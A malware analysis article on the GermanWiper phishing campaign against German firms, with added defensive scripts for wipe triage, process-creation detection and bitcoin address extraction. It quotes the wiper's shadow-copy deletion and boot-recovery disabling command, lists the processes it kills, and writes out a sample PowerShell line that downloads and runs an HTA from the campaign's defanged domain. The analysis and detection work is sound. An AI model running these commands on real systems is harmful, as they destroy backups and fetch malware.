
Multiple German companies were off to a rough start last week when a phishing campaign targeted them with data-wiping malware that also demands a ransom. The malware has been named GermanWiper because it targets German victims and is a destructive wiper rather than ransomware.

The malware was first reported on the BleepingComputer forums on Tuesday, July 30, and users who examined their files soon found that it is a data wiper despite its ransom demand.

No data recovery

After compromising a computer and wiping its files, GermanWiper leaves a ransom note claiming that the data was encrypted and will not be decrypted unless BTC 0.15038835 is transferred to a listed bitcoin address.

Paying is pointless: the malware does not encrypt the data but overwrites it in place, destroying it, according to security researcher Michael Gillespie.

The first sample seen by security researchers was built on Monday, July 29. The ID Ransomware service started to receive submissions the same day, shortly after 10 AM CEST, MalwareHunterTeam told BleepingComputer.

The end of the work week (Friday, August 2) saw the highest number of ID Ransomware submissions for GermanWiper, indicating that the campaign had hit plenty of targets. After that day, submissions dwindled to fewer than 20.

GermanWiper distribution

GermanWiper is being distributed in Germany through a spam campaign that pretends to come from a job applicant named Lena Kretschmer submitting her résumé.

The emails being sent have the subject “Ihr Stellenangebot – Bewerbung [Your job offer – Application] – Lena Kretschmer” and contain an attachment titled “Unterlagen_Lena_Kretschmer.zip” posing as a document archive.

[Screenshot: Spam Email]

The attachment contains two files that pretend to be PDF résumés for the sender. Security researcher James found that these “PDFs” are actually Windows shortcut (LNK) files that execute a PowerShell command to download an HTA file from the expandingdelegation[.]top site and launch it on the local machine.

[Screenshot: Malicious Shortcut]

The PowerShell command that is executed is shown in the screenshot below:

[Screenshot: PowerShell Command]

When the HTA file is executed, it downloads the wiper executable, saves it to the C:\Users\Public folder under a three-letter file name, and launches it, BleepingComputer’s analysis found.

How GermanWiper destroys a victim’s data

According to analysis by BleepingComputer, when GermanWiper is first executed it terminates processes associated with database and other software so that their open files can be accessed and wiped. The list of terminated processes is below:

notepad.exe
dbeng50.exe
sqbcoreservice.exe
encsvc.exe
mydesktopservice.exe
isqlplussvc.exe
agntsvc.exe
sql.exe
sqld.exe
mysql.exe
mysqld.exe
oracle.exe

It then scans the system for files to destroy. When wiping, it skips files with certain names or extensions and files located in particular folders. The folders spared by the wiping process are listed below; the set of extensions left untouched by the malware is given at the end of this article.

windows
recycle.bin
mozilla
google
boot
application data
appdata
program files
program files (x86)
programme
programme (x86)
programdata
perflogs
intel
msocache
system volume information

They are skipped because they are needed for Windows to boot properly and for the browsers to keep working.

Destroying the data is done by overwriting its content with zeroes.

[Screenshot: Zeroed out, or wiped, file]

To make it look like an encryption process occurred, a random five-character extension such as .08kJA, .AVco3, or .Fi2Ed is appended to each file’s name.
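The two traits described above (zero-filled content, random five-character extension) let an analyst confirm wiping rather than encryption before anyone considers paying. The triage script below is an added example, not code from the article or from the malware; it assumes the extension is five alphanumeric characters, constructs its own sample files in a temporary directory, and uses byte entropy to separate a zeroed file from a genuinely encrypted one.

```python
"""
Added example: tell zero-filled (wiped) files from encrypted ones.
Not code from the article or the malware. Assumes the behaviour described
above: a random five-character alphanumeric extension is appended to each
file and the content is overwritten with zeroes. All sample files are
constructed in a temporary directory.
"""
from __future__ import annotations

import hashlib
import math
import re
import tempfile
from collections import Counter
from pathlib import Path

# Assumed shape of the appended extension: five letters/digits (.08kJA, .AVco3, .Fi2Ed)
RANDOM_EXT = re.compile(r"^\.[A-Za-z0-9]{5}$")


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: close to 8.0 for ciphertext, 0.0 for a run of zeroes."""
    n = len(data)
    if not n:
        return 0.0
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def classify(path: Path, sample_size: int = 65536) -> str:
    """Inspect the first sample_size bytes: 'wiped' (all zero), 'encrypted' (high entropy) or 'plaintext'."""
    with path.open("rb") as fh:
        sample = fh.read(sample_size)
    if not sample:
        return "empty"
    if sample.count(0) == len(sample):
        return "wiped"
    return "encrypted" if shannon_entropy(sample) > 7.5 else "plaintext"


def triage(root: Path) -> dict[str, dict]:
    """Report every file that carries a random extension or is zero-filled."""
    findings: dict[str, dict] = {}
    for path in root.rglob("*"):
        if not path.is_file():
            continue
        renamed = bool(RANDOM_EXT.match(path.suffix))
        state = classify(path)
        if renamed or state == "wiped":
            findings[path.relative_to(root).as_posix()] = {"renamed": renamed, "state": state}
    return findings


def pseudo_random_bytes(n: int, seed: bytes = b"constructed") -> bytes:
    """Deterministic high-entropy filler standing in for ciphertext (SHA-256 chain)."""
    out, block = bytearray(), seed
    while len(out) < n:
        block = hashlib.sha256(block).digest()
        out.extend(block)
    return bytes(out[:n])


def build_sample_tree(root: Path) -> None:
    """Constructed sample: one wiped file, one encrypted-looking file, one untouched document."""
    docs = root / "docs"
    docs.mkdir()
    (docs / "report.docx.08kJA").write_bytes(b"\x00" * 4096)              # what GermanWiper leaves behind
    (docs / "budget.xlsx.AVco3").write_bytes(pseudo_random_bytes(4096))   # what real ransomware would leave
    (docs / "notes.txt").write_bytes(b"quarterly notes\n" * 64)           # untouched plaintext


def demo() -> dict[str, dict]:
    """Build the sample tree in a temp dir and return the triage findings."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        build_sample_tree(root)
        return triage(root)


if __name__ == "__main__":
    for name, info in demo().items():
        print(f"{name}: renamed={info['renamed']} state={info['state']}")
```

A renamed file whose sample is entirely zero is the signature of this wiper; a renamed file with entropy near 8 bits per byte is what real ransomware leaves. Legitimately zero-filled files (preallocated or sparse files) will also show up as "wiped", so read the result together with the extension and the timestamps.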

After the wiping process completes, GermanWiper also deletes the volume shadow copies and disables Windows automatic startup repair by launching the following command:

cmd.exe /k vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
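The delivery chain (shortcut to PowerShell to HTA to a three-letter executable in C:\Users\Public) and the vssadmin/bcdedit command above map directly onto process-creation telemetry. The script below is an added example, not part of the original article: it runs three detections over constructed Sysmon-style process events. The PowerShell command line, the HTA file name and the three-letter executable name in the sample events are assumptions, since the page shows the command only as a screenshot and names no file; only the vssadmin/bcdedit line is the one the article reports.

```python
"""
Added example: three process-creation detections for the GermanWiper
delivery chain and its recovery-disabling command, run over constructed
Sysmon-style (Event ID 1) events. Not code from the article. The
PowerShell command line, the HTA name and the three-letter executable
name are assumptions; only the vssadmin/bcdedit line is the one the
article reports.
"""
from __future__ import annotations

import re

# Rule 1: PowerShell launched from a shortcut (so parented by explorer.exe)
# that downloads and runs an .hta file. The exact command line is assumed.
HTA_DOWNLOAD = re.compile(
    r"(DownloadFile|DownloadString|Invoke-WebRequest|\biwr\b|Net\.WebClient)[^\n]*\.hta\b",
    re.IGNORECASE,
)
# Rule 2: mshta.exe starting a three-letter executable from C:\Users\Public,
# the drop location reported in the analysis.
PUBLIC_DROP = re.compile(r"^C:\\Users\\Public\\[A-Za-z0-9]{3}\.exe$", re.IGNORECASE)
# Rule 3: shadow copy deletion and startup-repair tampering, matching the
# command line the wiper runs after wiping.
SHADOW_DELETE = re.compile(r"vssadmin(\.exe)?\s+delete\s+shadows", re.IGNORECASE)
RECOVERY_OFF = re.compile(
    r"bcdedit(\.exe)?\s+/set\s+\{default\}\s+"
    r"(recoveryenabled\s+no|bootstatuspolicy\s+ignoreallfailures)",
    re.IGNORECASE,
)


def basename(path: str) -> str:
    """Last path component, lower-cased, so rules compare image names only."""
    return path.rsplit("\\", 1)[-1].lower()


def detect(event: dict) -> list[str]:
    """Return the names of the rules this process-creation event triggers."""
    image = basename(event["Image"])
    parent = basename(event.get("ParentImage", ""))
    cmd = event.get("CommandLine", "")
    hits: list[str] = []
    if image == "powershell.exe" and parent == "explorer.exe" and HTA_DOWNLOAD.search(cmd):
        hits.append("lnk_powershell_hta_download")
    if parent == "mshta.exe" and PUBLIC_DROP.match(event["Image"]):
        hits.append("mshta_public_three_letter_exe")
    shadow, recovery = bool(SHADOW_DELETE.search(cmd)), bool(RECOVERY_OFF.search(cmd))
    if shadow and recovery:
        hits.append("shadow_delete_and_recovery_disable")
    elif shadow or recovery:
        hits.append("shadow_or_recovery_tampering")
    return hits


# Constructed events. The domain is kept defanged, as the article prints it.
SAMPLE_EVENTS = [
    {   # assumed shape of the shortcut's PowerShell stage
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": r"powershell.exe -w hidden -c (New-Object Net.WebClient)"
                       r".DownloadFile('hxxp://expandingdelegation[.]top/u.hta','C:\Users\Public\u.hta');"
                       r"mshta C:\Users\Public\u.hta",
    },
    {   # assumed: the HTA launching the dropped wiper under a three-letter name
        "Image": r"C:\Users\Public\abc.exe",
        "ParentImage": r"C:\Windows\System32\mshta.exe",
        "CommandLine": r"C:\Users\Public\abc.exe",
    },
    {   # the exact command reported in the article, parented by the wiper
        "Image": r"C:\Windows\System32\cmd.exe",
        "ParentImage": r"C:\Users\Public\abc.exe",
        "CommandLine": r"cmd.exe /k vssadmin.exe delete shadows /all /quiet & "
                       r"bcdedit.exe /set {default} recoveryenabled no & "
                       r"bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures",
    },
    {   # benign: an administrator listing shadow copies
        "Image": r"C:\Windows\System32\vssadmin.exe",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "CommandLine": "vssadmin list shadows",
    },
]


def run(events: list[dict] = SAMPLE_EVENTS) -> list[list[str]]:
    """Evaluate every event and return the rule hits in order."""
    return [detect(e) for e in events]


if __name__ == "__main__":
    for event, hits in zip(SAMPLE_EVENTS, run()):
        print(f"{basename(event['Image'])}: {hits or 'clean'}")
```

Rule 3 is the one worth deploying first: the combined vssadmin delete plus bcdedit recoveryenabled/bootstatuspolicy pair has almost no legitimate use and, on an endpoint, fires before the note is even displayed. Rules 1 and 2 depend on the parent-child relationship, which is why the events carry ParentImage.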

The wiper also creates a ransom note named Fi2Ed_Entschluesselungs_Anleitung.html (“decryption instructions”) that is opened automatically at the end of the wiping procedure. There, victims find instructions to pay 0.15038835 bitcoins, roughly $1,600 at the time, to the listed bitcoin address.

[Screenshot: GermanWiper Ransom Note]

The information is also given to victims through a desktop wallpaper that the malware enables on infected machines. The message translates to “Open Fi2Ed_Entschluesselungs_Anleitung.html to find out how to decode your files.”

The wiper executable contains 36 base64-encoded bitcoin addresses, and the malware selects one at random for each victim. The full list of bitcoin addresses is given in the IOC section at the end of this article.

While the ransom note suggests that the bitcoin address is unique per victim, as in the translated text “Send the following amount to the Bitcoin address generated for you”, the wiper simply picks one of these hardcoded addresses.

We were provided the bitcoin address 19sd86duTh7vkYUwMDJirP1F513Tvwo7fv, which shows an incoming transaction of the amount requested by the attacker and an outgoing transfer of the same amount to a different wallet.
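Because the addresses sit in the binary base64-encoded, an analyst building an IOC list has to decode them and should verify each one with its base58check checksum, so that a mistyped or truncated address does not end up in a blocklist. The script below is an added example, not the article’s or the wiper’s code. The byte blob it scans is constructed: it holds a well-known valid address, a deliberately corrupted copy of it, and the address quoted in the article, not the wiper’s 36-address list.

```python
"""
Added example: recover base64-encoded bitcoin addresses from a binary blob
and validate each with its base58check checksum. Not the article's or the
wiper's code; the blob scanned below is constructed and is not the wiper's
real address list.
"""
from __future__ import annotations

import base64
import hashlib
import re

B58_ALPHABET = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"
# Base64 runs long enough to hold a 26..35 character address (44+ characters)
B64_RUN = re.compile(rb"[A-Za-z0-9+/]{40,}={0,2}")
# Legacy base58 address: version character 1 (P2PKH) or 3 (P2SH), 26..35 characters
ADDRESS = re.compile(r"^[13][1-9A-HJ-NP-Za-km-z]{25,34}$")


def b58decode(text: str) -> bytes:
    """Decode base58; each leading '1' stands for a leading zero byte."""
    value = 0
    for ch in text:
        value = value * 58 + B58_ALPHABET.index(ch)
    body = value.to_bytes((value.bit_length() + 7) // 8, "big") if value else b""
    leading_zeroes = len(text) - len(text.lstrip("1"))
    return b"\x00" * leading_zeroes + body


def valid_address(addr: str) -> bool:
    """True if addr has the right shape and its 4-byte double-SHA256 checksum matches."""
    if not ADDRESS.match(addr):
        return False
    raw = b58decode(addr)
    if len(raw) != 25:  # 1 version byte + 20-byte hash + 4-byte checksum
        return False
    payload, checksum = raw[:21], raw[21:]
    return hashlib.sha256(hashlib.sha256(payload).digest()).digest()[:4] == checksum


def extract_addresses(blob: bytes) -> dict[str, bool]:
    """Map every base64 run that decodes to an address-shaped string to its checksum result."""
    found: dict[str, bool] = {}
    for run in B64_RUN.findall(blob):
        try:
            decoded = base64.b64decode(run, validate=True).decode("ascii")
        except (ValueError, UnicodeDecodeError):
            continue
        if ADDRESS.match(decoded):
            found[decoded] = valid_address(decoded)
    return found


GENESIS_ADDRESS = "1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa"   # well-known valid address
CORRUPTED_ADDRESS = GENESIS_ADDRESS[:-1] + "b"           # last character altered: checksum must fail
ARTICLE_ADDRESS = "19sd86duTh7vkYUwMDJirP1F513Tvwo7fv"   # as printed in the article

# Constructed stand-in for a strings(1) pass over the wiper: base64 runs separated by junk.
SAMPLE_BLOB = (
    b"\x00MZ\x90junk\x00"
    + b"\x00".join(base64.b64encode(a.encode()) for a in (GENESIS_ADDRESS, CORRUPTED_ADDRESS, ARTICLE_ADDRESS))
    + b"\x00\xff"
)


if __name__ == "__main__":
    for addr, ok in extract_addresses(SAMPLE_BLOB).items():
        print(f"{addr}  checksum {'OK' if ok else 'FAILED'}")
```

The checksum catches single-character transcription errors, which matters when 36 addresses are copied from a decoded string table into a report. It says nothing about whether an address is in use; for that, as the article did, the address has to be looked up on the blockchain.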

Ransom note includes tracking script

The ransom note for this wiper includes an interesting bit of JavaScript at the bottom that is executed every time you open the note.

This script, shown below, connects to the wiper’s C2 server and sends the bitcoin address associated with the victim along with other information. Because the ransom note is opened automatically by the wiper at the end of execution, the attacker uses this script to count victims.

[Screenshot: Tracking Script]

Similar to recent Sodinokibi/REvil campaign

GermanWiper has some similarities with a recent Sodinokibi ransomware campaign that pushed malicious emails impersonating BSI, the German national cybersecurity authority.

As can be seen below, the same PowerShell command is used for both pieces of malware, albeit with a different domain as an argument.

[Screenshot: Campaign similarities]

Furthermore, the same delivery method used by Sodinokibi (malicious shortcut files masquerading as PDFs, and the use of HTA to extract and deploy the malware) is observed in the GermanWiper attacks.

The difference is that while the former encrypts the data so that it can be ransomed, the latter erases it, eliminating any chance of recovery and, with it, any reason for the attackers to be paid.